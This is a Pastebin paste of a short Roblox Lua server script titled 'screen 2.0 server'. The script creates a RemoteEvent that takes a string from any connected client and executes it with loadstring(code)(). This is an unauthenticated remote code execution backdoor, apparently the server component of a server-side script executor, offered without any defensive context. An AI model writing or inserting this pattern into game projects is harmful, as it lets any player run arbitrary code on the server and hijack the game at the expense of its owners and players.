Advertisement
bobopopcornboy

screen 2.0 server

Sep 8th, 2024
23
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.19 KB | None | 0 0
  1. event = Instance.new("RemoteEvent")
  2. event.Name = "event"
  3. event.Parent = script
  4.  
  5. event.OnServerEvent:Connect(function(player,cmd,code)
  6. if cmd == "run" then
  7. loadstring(code)()
  8. end
  9. end)
Tags: Roblox
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement